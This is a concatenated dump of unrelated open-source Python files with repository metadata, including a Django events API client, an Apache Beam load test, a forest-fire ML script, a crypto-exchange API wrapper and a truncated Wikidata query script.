'dict_feature': [{'a' : 23}, {'a' : 13}, ... {'b' : 1}, ... {'a' : 23, 'b' : 32}]}) >>> m2 = turicreate.ranking_factorization_recommender.create(sf, ... target='rating', ... user_data=user_info, ... item_data=item_info) **Optimizing for ranking performance** Create a model that pushes predicted ratings of unobserved user-item pairs toward 1 or below. >>> m3 = turicreate.ranking_factorization_recommender.create(sf, ... target='rating', ... ranking_regularization = 0.1, ... unobserved_rating_value = 1) """ def __init__(self, model_proxy): '''__init__(self)''' self.__proxy__ = model_proxy @classmethod def _native_name(cls): return "ranking_factorization_recommender"
46.229242
105
0.640233
a5c6bf8b12b083488ccb5fddf9ee20aeaf816653
3,918
py
Python
copilot/events/api_models.py
febsn/djangocms-copilot
e4b268ad522d972333b037ef8a1c317cc537da9e
[ "MIT" ]
null
null
null
copilot/events/api_models.py
febsn/djangocms-copilot
e4b268ad522d972333b037ef8a1c317cc537da9e
[ "MIT" ]
null
null
null
copilot/events/api_models.py
febsn/djangocms-copilot
e4b268ad522d972333b037ef8a1c317cc537da9e
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals from datetime import datetime, date from copilot.conf import settings from copilot.api import CopilotClient from copilot.base_api_models import BaseApiManager class EventManager(BaseApiManager): ALL_ENDPOINT = 'events/' ARTIST_ENDPOINT = 'artists/{id}/events/' SORTING = 'dateOfEvent,asc' FROM = 'from/{}/' ARTIST_FROM = '{}/' TO = 'to/{}/' ARTIST_TO = '{}/' def _get_from(self): if self.artist_id: return self.ARTIST_FROM else: return self.FROM def _get_to(self): if self.artist_id: return self.ARTIST_TO else: return self.TO def _get_endpoint(self, **kwargs): endpoint = super(EventManager, self)._get_endpoint(**kwargs) try: start_date = kwargs['start_date'] endpoint += self._get_from().format(start_date.isoformat()) # the API allows only calls with start_date AND end_date, or neither of them. # If there is only start_date given, we assume a delta of one year. endpoint += self._get_to().format( kwargs.get('end_date', date(start_date.year+1, start_date.month, start_date.day)).isoformat() ) except KeyError: # no problem if start_date and end_date not given pass return endpoint def _get(self, endpoint, **kwargs): kwargs['external'] = False events = super(EventManager, self)._get(endpoint, **kwargs) events['artists'] = {} for event in events['content']: try: event['dateOfEvent'] = datetime.strptime(event['dateOfEvent']+event['start'], '%Y-%m-%d%H:%M:%S.%f') except KeyError: try: event['dateOfEvent'] = datetime.strptime(event['dateOfEvent'], '%Y-%m-%d') except KeyError: pass for cast_item in event['cast']: try: events['artists'][cast_item['artist']['id']]['events'].append(event) except KeyError: events['artists'][cast_item['artist']['id']] = { 'artist': cast_item['artist'], 'events': [event, ] } return events def _get_years(self): endpoint = self._get_endpoint() events = self._get(endpoint) years = {} for event in events: try: years[event['dateOfEvent'].year].append(event) except KeyError: years[event['dateOfEvent'].year] = [event, ] return years def year(self, year=None): """ Return events for year `year`. """ if year is None: year = datetime.now().year endpoint = self._get_endpoint( start_date=date(year, 1, 1), end_date=date(year, 12, 31) ) return self._get(endpoint) def prevnext(self, year=None): """ Return events for year `year` and one year before and after. """ if year is None: year = datetime.now().year endpoint = self._get_endpoint( start_date=date(year-1, 1, 1), end_date=date(year+1, 12, 31) ) return self._get(endpoint) @property def years(self): try: return self._years except AttributeError: self._years = self._get_years() return self._years def upcoming(self, **kwargs): endpoint = self._get_endpoint( start_date=datetime.now().date()) return self._get(endpoint, **kwargs) def __str__(self): if self.artist_id: return 'EventManager for {}'.format(self.artist_id) else: return 'EventManager'
31.596774
116
0.545942
658ef5156c6bc6fe60a06664d23eead8bb8a47b5
1,214
py
Python
api/mfwgallery/urls-dev.py
ankkamies/mfwgallery-api
c03d20b24fd4ef5d3e9be173b917eea493a5c3d6
[ "MIT" ]
null
null
null
api/mfwgallery/urls-dev.py
ankkamies/mfwgallery-api
c03d20b24fd4ef5d3e9be173b917eea493a5c3d6
[ "MIT" ]
null
null
null
api/mfwgallery/urls-dev.py
ankkamies/mfwgallery-api
c03d20b24fd4ef5d3e9be173b917eea493a5c3d6
[ "MIT" ]
null
null
null
from django.conf.urls import patterns, include, url from django.conf.urls.static import static from mfwgallery import settings from rest_framework.routers import SimpleRouter from rest_framework_nested import routers from posts import views # Initialize routes router = routers.SimpleRouter() router.register(r'posts', views.PostViewSet) router.register(r'tags', views.TagViewSet) router.register(r'users', views.UserViewSet) router.register(r'images', views.ImageViewSet) # Initialize nested routes users_router = routers.NestedSimpleRouter(router, r'users', lookup='user') users_router.register(r'posts', views.UserPostViewSet) posts_router = routers.NestedSimpleRouter(router, r'posts', lookup='post') posts_router.register(r'comments', views.CommentViewSet) posts_router.register(r'tags', views.PostTagViewSet) # Create URL patterns urlpatterns = patterns('', url(r'^api/', include(router.urls)), url(r'^api/', include(posts_router.urls)), url(r'^api/', include(users_router.urls)), url(r'^api/auth/login/$', views.LoginView.as_view()), url(r'^api/auth/register/$', views.RegisterView.as_view()), ) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
35.705882
74
0.76112
371f52e69d239065ca75793860fd46c1cbdfb669
5,426
py
Python
sdks/python/apache_beam/testing/load_tests/combine_test.py
a-satyateja/beam
30a04b912979adf5f316cc8ace334d921ca71838
[ "Apache-2.0" ]
2
2019-06-03T02:47:29.000Z
2019-06-12T21:22:41.000Z
sdks/python/apache_beam/testing/load_tests/combine_test.py
a-satyateja/beam
30a04b912979adf5f316cc8ace334d921ca71838
[ "Apache-2.0" ]
7
2020-01-28T22:46:48.000Z
2022-02-10T00:10:51.000Z
sdks/python/apache_beam/testing/load_tests/combine_test.py
a-satyateja/beam
30a04b912979adf5f316cc8ace334d921ca71838
[ "Apache-2.0" ]
6
2019-06-02T16:18:52.000Z
2020-11-04T04:17:08.000Z
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ This is Combine load test with Synthetic Source. Besides of the standard input options there are additional options: * fanout (optional) - number of GBK operations to run in parallel * project (optional) - the gcp project in case of saving metrics in Big Query (in case of Dataflow Runner it is required to specify project of runner), * publish_to_big_query - if metrics should be published in big query, * metrics_namespace (optional) - name of BigQuery dataset where metrics will be stored, * metrics_table (optional) - name of BigQuery table where metrics will be stored, * input_options - options for Synthetic Sources. Example test run on DirectRunner: python setup.py nosetests \ --test-pipeline-options=" --project=big-query-project --publish_to_big_query=true --metrics_dataset=python_load_tests --metrics_table=combine --fanout=1 --input_options='{ \"num_records\": 300, \"key_size\": 5, \"value_size\":15, \"bundle_size_distribution_type\": \"const\", \"bundle_size_distribution_param\": 1, \"force_initial_num_bundles\": 0 }'" \ --tests apache_beam.testing.load_tests.combine_test or: ./gradlew -PloadTest.args=' --publish_to_big_query=true --project=... --metrics_dataset=python_load_test --metrics_table=combine --input_options=\' {"num_records": 1, "key_size": 1, "value_size":1, "bundle_size_distribution_type": "const", "bundle_size_distribution_param": 1, "force_initial_num_bundles": 1}\' --runner=DirectRunner --fanout=1' \ -PloadTest.mainClass=apache_beam.testing.load_tests.combine_test \ -Prunner=DirectRunner :sdks:python:apache_beam:testing:load-tests:run To run test on other runner (ex. Dataflow): python setup.py nosetests \ --test-pipeline-options=" --runner=TestDataflowRunner --fanout=1 --project=... --staging_location=gs://... --temp_location=gs://... --sdk_location=./dist/apache-beam-x.x.x.dev0.tar.gz --publish_to_big_query=true --metrics_dataset=python_load_tests --metrics_table=combine --input_options='{ \"num_records\": 1000, \"key_size\": 5, \"value_size\":15, \"bundle_size_distribution_type\": \"const\", \"bundle_size_distribution_param\": 1, \"force_initial_num_bundles\": 0 }'" \ --tests apache_beam.testing.load_tests.combine_test or: ./gradlew -PloadTest.args=' --publish_to_big_query=true --project=... --metrics_dataset=python_load_tests --metrics_table=combine --temp_location=gs://... --input_options=\' {"num_records": 1, "key_size": 1, "value_size":1, "bundle_size_distribution_type": "const", "bundle_size_distribution_param": 1, "force_initial_num_bundles": 1}\' --runner=TestDataflowRunner --fanout=1' \ -PloadTest.mainClass= apache_beam.testing.load_tests.combine_test \ -Prunner= TestDataflowRunner :sdks:python:apache_beam:testing:load-tests:run """ from __future__ import absolute_import import logging import os import unittest import apache_beam as beam from apache_beam.testing import synthetic_pipeline from apache_beam.testing.load_tests.load_test import LoadTest from apache_beam.testing.load_tests.load_test_metrics_utils import MeasureTime load_test_enabled = False if os.environ.get('LOAD_TEST_ENABLED') == 'true': load_test_enabled = True @unittest.skipIf(not load_test_enabled, 'Enabled only for phrase triggering.') class CombineTest(LoadTest): def setUp(self): super(CombineTest, self).setUp() self.fanout = self.pipeline.get_option('fanout') if self.fanout is None: self.fanout = 1 else: self.fanout = int(self.fanout) class _GetElement(beam.DoFn): def process(self, element): yield element def testCombineGlobally(self): input = (self.pipeline | beam.io.Read(synthetic_pipeline.SyntheticSource( self.parseTestPipelineOptions())) | 'Measure time: Start' >> beam.ParDo( MeasureTime(self.metrics_namespace)) ) for branch in range(self.fanout): # pylint: disable=expression-not-assigned (input | 'Combine with Top %i' % branch >> beam.CombineGlobally( beam.combiners.TopCombineFn(1000)) | 'Consume %i' % branch >> beam.ParDo(self._GetElement()) | 'Measure time: End %i' % branch >> beam.ParDo( MeasureTime(self.metrics_namespace)) ) if __name__ == '__main__': logging.getLogger().setLevel(logging.DEBUG) unittest.main()
32.491018
78
0.697383
a28ce3c76b96b4f00e948f99fed3718c672500f0
3,388
py
Python
training.py
Utkarsh-Shakya/Capstone_Project
ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536
[ "MIT" ]
null
null
null
training.py
Utkarsh-Shakya/Capstone_Project
ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536
[ "MIT" ]
null
null
null
training.py
Utkarsh-Shakya/Capstone_Project
ac9b85e9b50f7f15a3ab6dc6d98539b3763e6536
[ "MIT" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # In[ ]: #Importing required libraries import numpy as np import pandas as pd import matplotlib.pyplot as plt # In[ ]: from sklearn.model_selection import train_test_split from sklearn.linear_model import LinearRegression, LogisticRegression from sklearn.cluster import KMeans from sklearn.preprocessing import StandardScaler # In[ ]: #For ignoring warnings import warnings warnings.filterwarnings(action='ignore') # # Data Pre-processing # In[ ]: #Reading the dataset df=pd.read_csv('forestfires.csv') # In[ ]: #Function for pre-processing data according to regression or classification def preprocessing(df, task="regression"): df=pd.read_csv('forestfires.csv') #Converting String values of month and day into Integer month = {'jan':1, 'feb':2, 'mar':3, 'apr':4, 'may':5, 'jun':6, 'jul':7, 'aug':8, 'sep':9, 'oct':10, 'nov':11, 'dec':12,} df['month'] = df['month'].map(month) day = {'sun':1, 'mon':2, 'tue':3, 'wed':4, 'thu':5, 'fri':6, 'sat':7,} df['day'] = df['day'].map(day) #Converting target feature according to training model used if(task=="regression"): #Using Log Transformation to reduce skewness of the target feature df['area']=np.log(df['area']+1) X = df.drop(["area"], axis=1) y = df['area'] #If model is classification, then converting area burnt into 1(if it is greater than 0) else 0 elif(task=="classification"): X = df.drop("area", axis=1) y = df['area'].apply(lambda x:1 if x>0 else 0) #If model is clustering, then storing values of two most important input features(DMC and temp) elif(task=="clustering"): X = df.iloc[1:500, [5,8]].values y= None else: raise Exception("Enter regression, classification or clustering") #Scaling the input features scaler=StandardScaler() scaler.fit(X) if(task=="regression" or task=="classification"): X=pd.DataFrame(scaler.transform(X), columns=X.columns) return X, y # # Training the model # In[ ]: #Defining model training functions for regression and classification def supervised_method(X,y, task="regression"): X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.7, shuffle=True, random_state=1) if (task=="regression"): model=LinearRegression() model.fit(X_train,y_train) elif (task=="classification"): model=LogisticRegression() model.fit(X_train,y_train) else: raise Exception("Enter regression or classification") return model # In[70]: #Defining model training functions for clustering def unsupervised_method(X): model = KMeans(n_clusters=4, init='random', random_state=0) y_km = model.fit_predict(X) plt.scatter(X[y_km==0,0],X[y_km==0,1],s=20,c='green',marker='x',label='Very low Fire') plt.scatter(X[y_km==1,0],X[y_km==1,1],s=20,c='orange',marker='x',label='Low Fire') plt.scatter(X[y_km==2,0],X[y_km==2,1],s=20,c='blue',marker='x',label='Medium Fire') plt.scatter(X[y_km==3,0],X[y_km==3,1],s=20,c='black',marker='x',label='High Fire') plt.scatter(model.cluster_centers_[:,0],model.cluster_centers_[:,1],s=250,marker='*',c='red',label='centroids') plt.legend() plt.xlabel('DMC') plt.ylabel('Temp') plt.grid() plt.show() return model
26.677165
124
0.655549
70a893143160b49be182df7c4eb9ac945bd79def
399
py
Python
postfixadmin/postfixadmin/wsgi.py
fretscha/django-postfix-admin
0474370fdd837ab34c8bf6ef03e02b66a54f3119
[ "MIT" ]
1
2015-01-24T13:29:58.000Z
2015-01-24T13:29:58.000Z
postfixadmin/postfixadmin/wsgi.py
fretscha/django-postfix-admin
0474370fdd837ab34c8bf6ef03e02b66a54f3119
[ "MIT" ]
null
null
null
postfixadmin/postfixadmin/wsgi.py
fretscha/django-postfix-admin
0474370fdd837ab34c8bf6ef03e02b66a54f3119
[ "MIT" ]
3
2015-01-25T19:48:31.000Z
2021-01-08T20:49:50.000Z
""" WSGI config for postfixadmin project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/ """ import os os.environ.setdefault("DJANGO_SETTINGS_MODULE", "postfixadmin.settings") from django.core.wsgi import get_wsgi_application application = get_wsgi_application()
26.6
78
0.796992
552155a5f9d277c63da557d30cfee54197f2b773
12,557
py
Python
anyex/xbtce.py
ttwishing/anyex
cfd1f2f04ab992b790add4843aafff91e5773cbf
[ "MIT" ]
null
null
null
anyex/xbtce.py
ttwishing/anyex
cfd1f2f04ab992b790add4843aafff91e5773cbf
[ "MIT" ]
null
null
null
anyex/xbtce.py
ttwishing/anyex
cfd1f2f04ab992b790add4843aafff91e5773cbf
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN: # https://github.com/anyex/anyex/blob/master/CONTRIBUTING.md#how-to-contribute-code from anyex.base.exchange import Exchange import hashlib from anyex.base.errors import ExchangeError from anyex.base.errors import NotSupported from anyex.base.errors import AuthenticationError class xbtce (Exchange): def describe(self): return self.deep_extend(super(xbtce, self).describe(), { 'id': 'xbtce', 'name': 'xBTCe', 'countries': 'RU', 'rateLimit': 2000, # responses are cached every 2 seconds 'version': 'v1', 'has': { 'publicAPI': False, 'CORS': False, 'fetchTickers': True, 'createMarketOrder': False, }, 'urls': { 'logo': 'https://user-images.githubusercontent.com/1294454/28059414-e235970c-662c-11e7-8c3a-08e31f78684b.jpg', 'api': 'https://cryptottlivewebapi.xbtce.net:8443/api', 'www': 'https://www.xbtce.com', 'doc': [ 'https://www.xbtce.com/tradeapi', 'https://support.xbtce.info/Knowledgebase/Article/View/52/25/xbtce-exchange-api', ], }, 'requiredCredentials': { 'apiKey': True, 'secret': True, 'uid': True, }, 'api': { 'public': { 'get': [ 'currency', 'currency/{filter}', 'level2', 'level2/{filter}', 'quotehistory/{symbol}/{periodicity}/bars/ask', 'quotehistory/{symbol}/{periodicity}/bars/bid', 'quotehistory/{symbol}/level2', 'quotehistory/{symbol}/ticks', 'symbol', 'symbol/{filter}', 'tick', 'tick/{filter}', 'ticker', 'ticker/{filter}', 'tradesession', ], }, 'private': { 'get': [ 'tradeserverinfo', 'tradesession', 'currency', 'currency/{filter}', 'level2', 'level2/{filter}', 'symbol', 'symbol/{filter}', 'tick', 'tick/{filter}', 'account', 'asset', 'asset/{id}', 'position', 'position/{id}', 'trade', 'trade/{id}', 'quotehistory/{symbol}/{periodicity}/bars/ask', 'quotehistory/{symbol}/{periodicity}/bars/ask/info', 'quotehistory/{symbol}/{periodicity}/bars/bid', 'quotehistory/{symbol}/{periodicity}/bars/bid/info', 'quotehistory/{symbol}/level2', 'quotehistory/{symbol}/level2/info', 'quotehistory/{symbol}/periodicities', 'quotehistory/{symbol}/ticks', 'quotehistory/{symbol}/ticks/info', 'quotehistory/cache/{symbol}/{periodicity}/bars/ask', 'quotehistory/cache/{symbol}/{periodicity}/bars/bid', 'quotehistory/cache/{symbol}/level2', 'quotehistory/cache/{symbol}/ticks', 'quotehistory/symbols', 'quotehistory/version', ], 'post': [ 'trade', 'tradehistory', ], 'put': [ 'trade', ], 'delete': [ 'trade', ], }, }, }) def fetch_markets(self): markets = self.privateGetSymbol() result = [] for p in range(0, len(markets)): market = markets[p] id = market['Symbol'] base = market['MarginCurrency'] quote = market['ProfitCurrency'] if base == 'DSH': base = 'DASH' symbol = base + '/' + quote symbol = symbol if market['IsTradeAllowed'] else id result.append({ 'id': id, 'symbol': symbol, 'base': base, 'quote': quote, 'info': market, }) return result def fetch_balance(self, params={}): self.load_markets() balances = self.privateGetAsset() result = {'info': balances} for b in range(0, len(balances)): balance = balances[b] currency = balance['Currency'] uppercase = currency.upper() # xbtce names DASH incorrectly as DSH if uppercase == 'DSH': uppercase = 'DASH' account = { 'free': balance['FreeAmount'], 'used': balance['LockedAmount'], 'total': balance['Amount'], } result[uppercase] = account return self.parse_balance(result) def fetch_order_book(self, symbol, limit=None, params={}): self.load_markets() market = self.market(symbol) orderbook = self.privateGetLevel2Filter(self.extend({ 'filter': market['id'], }, params)) orderbook = orderbook[0] timestamp = orderbook['Timestamp'] return self.parse_order_book(orderbook, timestamp, 'Bids', 'Asks', 'Price', 'Volume') def parse_ticker(self, ticker, market=None): timestamp = 0 last = None if 'LastBuyTimestamp' in ticker: if timestamp < ticker['LastBuyTimestamp']: timestamp = ticker['LastBuyTimestamp'] last = ticker['LastBuyPrice'] if 'LastSellTimestamp' in ticker: if timestamp < ticker['LastSellTimestamp']: timestamp = ticker['LastSellTimestamp'] last = ticker['LastSellPrice'] if not timestamp: timestamp = self.milliseconds() symbol = None if market: symbol = market['symbol'] return { 'symbol': symbol, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'high': ticker['DailyBestBuyPrice'], 'low': ticker['DailyBestSellPrice'], 'bid': ticker['BestBid'], 'bidVolume': None, 'ask': ticker['BestAsk'], 'askVolume': None, 'vwap': None, 'open': None, 'close': last, 'last': last, 'previousClose': None, 'change': None, 'percentage': None, 'average': None, 'baseVolume': ticker['DailyTradedTotalVolume'], 'quoteVolume': None, 'info': ticker, } def fetch_tickers(self, symbols=None, params={}): self.load_markets() tickers = self.publicGetTicker(params) tickers = self.index_by(tickers, 'Symbol') ids = list(tickers.keys()) result = {} for i in range(0, len(ids)): id = ids[i] market = None symbol = None if id in self.markets_by_id: market = self.markets_by_id[id] symbol = market['symbol'] else: base = id[0:3] quote = id[3:6] if base == 'DSH': base = 'DASH' if quote == 'DSH': quote = 'DASH' symbol = base + '/' + quote ticker = tickers[id] result[symbol] = self.parse_ticker(ticker, market) return result def fetch_ticker(self, symbol, params={}): self.load_markets() market = self.market(symbol) tickers = self.publicGetTickerFilter(self.extend({ 'filter': market['id'], }, params)) length = len(tickers) if length < 1: raise ExchangeError(self.id + ' fetchTicker returned empty response, xBTCe public API error') tickers = self.index_by(tickers, 'Symbol') ticker = tickers[market['id']] return self.parse_ticker(ticker, market) def fetch_trades(self, symbol, since=None, limit=None, params={}): self.load_markets() # no method for trades? return self.privateGetTrade(params) def parse_ohlcv(self, ohlcv, market=None, timeframe='1m', since=None, limit=None): return [ ohlcv['Timestamp'], ohlcv['Open'], ohlcv['High'], ohlcv['Low'], ohlcv['Close'], ohlcv['Volume'], ] def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}): # minutes = int(timeframe / 60) # 1 minute by default # periodicity = str(minutes) # self.load_markets() # market = self.market(symbol) # if not since: # since = self.seconds() - 86400 * 7 # last day by defulat # if not limit: # limit = 1000 # default # response = self.privateGetQuotehistorySymbolPeriodicityBarsBid(self.extend({ # 'symbol': market['id'], # 'periodicity': periodicity, # 'timestamp': since, # 'count': limit, # }, params)) # return self.parse_ohlcvs(response['Bars'], market, timeframe, since, limit) raise NotSupported(self.id + ' fetchOHLCV is disabled by the exchange') def create_order(self, symbol, type, side, amount, price=None, params={}): self.load_markets() if type == 'market': raise ExchangeError(self.id + ' allows limit orders only') response = self.privatePostTrade(self.extend({ 'pair': self.market_id(symbol), 'type': side, 'amount': amount, 'rate': price, }, params)) return { 'info': response, 'id': str(response['Id']), } def cancel_order(self, id, symbol=None, params={}): return self.privateDeleteTrade(self.extend({ 'Type': 'Cancel', 'Id': id, }, params)) def nonce(self): return self.milliseconds() def sign(self, path, api='public', method='GET', params={}, headers=None, body=None): if not self.apiKey: raise AuthenticationError(self.id + ' requires apiKey for all requests, their public API is always busy') if not self.uid: raise AuthenticationError(self.id + ' requires uid property for authentication and trading, their public API is always busy') url = self.urls['api'] + '/' + self.version if api == 'public': url += '/' + api url += '/' + self.implode_params(path, params) query = self.omit(params, self.extract_params(path)) if api == 'public': if query: url += '?' + self.urlencode(query) else: self.check_required_credentials() headers = {'Accept-Encoding': 'gzip, deflate'} nonce = str(self.nonce()) if method == 'POST': if query: headers['Content-Type'] = 'application/json' body = self.json(query) else: url += '?' + self.urlencode(query) auth = nonce + self.uid + self.apiKey + method + url if body: auth += body signature = self.hmac(self.encode(auth), self.encode(self.secret), hashlib.sha256, 'base64') credentials = self.uid + ':' + self.apiKey + ':' + nonce + ':' + self.binary_to_string(signature) headers['Authorization'] = 'HMAC ' + credentials return {'url': url, 'method': method, 'body': body, 'headers': headers}
38.636923
137
0.474317
dfc02ccdbc69fc9f6304f50138076a131d580512
2,333
py
Python
havepassword.py
weixiangnan/OneDriveShareLinkPushAria2
a415959a5e39e93b6ce8d417b7ad500368f8dc15
[ "Apache-2.0" ]
1
2021-09-03T03:47:41.000Z
2021-09-03T03:47:41.000Z
havepassword.py
weixiangnan/OneDriveShareLinkPushAria2
a415959a5e39e93b6ce8d417b7ad500368f8dc15
[ "Apache-2.0" ]
null
null
null
havepassword.py
weixiangnan/OneDriveShareLinkPushAria2
a415959a5e39e93b6ce8d417b7ad500368f8dc15
[ "Apache-2.0" ]
null
null
null
import os import asyncio from main import getFiles, downloadFiles, header from pprint import pprint OneDriveShareURL = "https://jia666-my.sharepoint.com/:f:/g/personal/1025_xkx_me/EsqNMFlDoyZKt-RGcsI1F2EB6AiQMBIpQM4Ka247KkyOQw?e=oC1y7r" OneDriveSharePwd = "xkx" aria2Link = "http://localhost:5800/jsonrpc" aria2Secret = "123456" isDownload = False downloadNum = "1,2-4,5" # 1,2,3,4,5 os.environ['PYPPETEER_HOME'] = os.path.split(os.path.realpath(__file__))[0] # os.environ['PYPPETEER_DOWNLOAD_HOST'] = "http://npm.taobao.org/mirrors" from pyppeteer import launch pheader = {} url = "" async def main(iurl, password): global pheader, url browser = await launch() page = await browser.newPage() await page.goto(iurl, {'waitUntil': 'networkidle0'}) await page.focus("input[id='txtPassword']") await page.keyboard.type(password) verityElem = await page.querySelector("input[id='btnSubmitPassword']") print("密码输入完成,正在跳转") await asyncio.gather( page.waitForNavigation(), verityElem.click(), ) url = await page.evaluate('window.location.href', force_expr=True) await page.screenshot({'path': 'example.png'}) print("正在获取Cookie") # print(p.headers, p.url) _cookie = await page.cookies() pheader = "" for __cookie in _cookie: coo = "{}={};".format(__cookie.get("name"), __cookie.get("value")) pheader += coo await browser.close() def havePwdGetFiles(iurl, password): global header print("正在启动无头浏览器模拟输入密码") asyncio.get_event_loop().run_until_complete(main(iurl, password)) print("无头浏览器关闭,正在获取文件列表") print() header['cookie'] = pheader print(getFiles(url, None, 0)) def havePwdDownloadFiles(iurl, password, aria2URL, token, num=-1): global header print("正在启动无头浏览器模拟输入密码") asyncio.get_event_loop().run_until_complete(main(iurl, password)) print("无头浏览器关闭,正在获取文件列表") header['cookie'] = pheader downloadFiles(url, None, 0, aria2URL, token, num=num) if __name__ == "__main__": if isDownload: havePwdDownloadFiles(OneDriveShareURL, OneDriveSharePwd, aria2Link, aria2Secret, num=downloadNum) else: havePwdGetFiles(OneDriveShareURL, OneDriveSharePwd)
30.298701
137
0.666952
99d2a3f3236264b7b98fe02443c3c249a71ae82d
1,785
py
Python
plugins/miscellaneous/misc_namer.py
almazboot/sketal
c36a415d2cf007cc85091a4637e8cda74ad88ca1
[ "MIT" ]
43
2017-10-29T11:05:47.000Z
2018-09-25T19:05:13.000Z
plugins/miscellaneous/misc_namer.py
almazboot/sketal
c36a415d2cf007cc85091a4637e8cda74ad88ca1
[ "MIT" ]
38
2017-10-28T12:29:58.000Z
2018-09-25T19:38:02.000Z
plugins/miscellaneous/misc_namer.py
almazboot/sketal
c36a415d2cf007cc85091a4637e8cda74ad88ca1
[ "MIT" ]
35
2017-10-30T05:35:28.000Z
2018-10-01T10:45:41.000Z
from handler.base_plugin import CommandPlugin from utils import Message class NamerPlugin(CommandPlugin): __slots__ = ("old_answer",) def __init__(self, *commands, prefixes=None, strict=False): """Answers with information about bot. Requires: StoragePlugin.""" if not commands: commands= ("зови меня",) super().__init__(*commands, prefixes=prefixes, strict=strict) self.description = [f"\"Зови меня\"", f"Указывает, как бот будет обращаться к вам.", f"{self.command_example()} [имя] - установить себе псевдоним.", f"{self.command_example()} никак - удалить свой псевдоним."] _answer = Message.answer async def new_answer(self, message="", **kwargs): if self.meta["data_user"] and "nickname" in self.meta["data_user"]: message = self.meta["data_user"]["nickname"] + ",\n" + message return await _answer(self, message, **kwargs) Message.answer = new_answer async def process_message(self, msg): if not msg.meta["data_user"]: return await msg.answer("👊 Нет нужного плагина для этого \_:c_/") _, name = self.parse_message(msg, full=True) fname = name.strip().lower() if len(fname) > 64: return await msg.answer("👊 Слишком длинное имя!") if any(mat in fname for mat in ("член", "гей", "хуй", "пидор")): return await msg.answer("👊 Нет.") if not fname or fname == "никак": if "nickname" in msg.meta["data_user"]: del msg.meta["data_user"]["nickname"] else: msg.meta["data_user"]["nickname"] = name return await msg.answer("💭 Хорошо")
36.428571
91
0.579272
53139cfad7edcacf26ce373fb36d0003c0a48156
1,594
py
Python
elasticmodelspy/types.py
g20ready/ElasticModelsPy
4222cd8586384650a66e39fb830d5bcd5f8d5831
[ "MIT" ]
null
null
null
elasticmodelspy/types.py
g20ready/ElasticModelsPy
4222cd8586384650a66e39fb830d5bcd5f8d5831
[ "MIT" ]
null
null
null
elasticmodelspy/types.py
g20ready/ElasticModelsPy
4222cd8586384650a66e39fb830d5bcd5f8d5831
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- from elasticmodelspy.analysis.base import Serializable class ElasticBaseType(Serializable): def __init__(self, name): super(ElasticBaseType, self).__init__(name) def __analysis_data__(self): return dict() class Text(ElasticBaseType): field_data = False index = True analyzer = None def __init__(self, field_data, index, analyzer): super(Text, self).__init__() self.field_data = field_data self.index = self.__validate_index(index) self.analyzer = self.__validate_analyzer(analyzer) def __validate_index(self, index): # TODO validate index return index def __validate_analyzer(self, analyzer): if not (isinstance(self.analyzer, BaseAnalyzer) or isinstance(self.analyzer, str)): raise TypeError('Analyzer ({0}) can only be of type elasticmodelspy.analyzers.BaseAnalyzer or str.'.format(analyzer)) return analyzer def __repr__(self): return "[ field_data : {0}, index : {1}, analyzer : {2} ]".format(self.field_data, self.index, self.analyzer) class Keyword(ElasticBaseType): pass class Numeric(ElasticBaseType): pass class Date(ElasticBaseType): pass class Boolean(ElasticBaseType): pass class Binary(ElasticBaseType): pass class Range(ElasticBaseType): pass class Array(ElasticBaseType): pass class Nested(ElasticBaseType): pass class GeoPoint(ElasticBaseType): pass class GeoShape(ElasticBaseType): pass class Completion(ElasticBaseType): pass
21.835616
129
0.69197
32bbca8ff7efe071ff8fdcab2e4a0df6a8a02cf3
4,427
py
Python
code/get_priors.py
ajoer/Cultural-Recommendation
cfb2c8d8c63c4b7604fea173644c5fac16c92044
[ "MIT" ]
null
null
null
code/get_priors.py
ajoer/Cultural-Recommendation
cfb2c8d8c63c4b7604fea173644c5fac16c92044
[ "MIT" ]
null
null
null
code/get_priors.py
ajoer/Cultural-Recommendation
cfb2c8d8c63c4b7604fea173644c5fac16c92044
[ "MIT" ]
null
null
null
#!/usr/bin/python3 """ Get prior probabilities for event type and language links. Query Wikidata using SPARQL. 1) Prior probability of event type P(Et): # events of type T / total # of events 2) Prior probability of lanugage link P(Ll): # ll to language L / total # of language links to all language Also need: 1 the distance from the event to the center of query LV, e.g. capitol. 4 event related entities popularity in query language (e.g. length of entity page in query language) or number of mentions of entity on query language Wiki.) """ import json import pandas as pd import requests import time import utils from collections import defaultdict, Counter languages = sorted(open("resources/wikipedia_LVs.txt").readlines()) # LV_stats = sorted(open("resources/wikipedia_LV_stats.tsv").readlines()[1:]) # LV_sizes = {} # for line in LV_stats: # line = line.split("\t") # language = line[1].strip() # size = int(line[2].strip().replace(",","")) # if size > 30000: # LV_sizes[language] = size all_languages = """ SELECT ?l WHERE { ?l wdt:P31/wdt:P279 wd:P424 . """ language_pairs_query = """ SELECT (COUNT(DISTINCT(?item)) AS ?cnt) ?l1 WHERE { ?item wdt:P31/wdt:P279 wd:Q1190554 . ?article1 schema:about ?item . ?article1 schema:inLanguage "%s" . ?article2 schema:about ?item . ?article2 schema:inLanguage ?l1 . FILTER("%s" != ?l1) . } GROUP BY ?l1 ORDER BY DESC(COUNT(DISTINCT(?item))) #LIMIT 10 """ # (Two types of event classes) # %s = wd:Q1656682, wd:Q1190554 event_types_query = """ SELECT ?item ?itemLabel (COUNT(?x) AS ?cnt) WHERE { ?item wdt:P279 %s 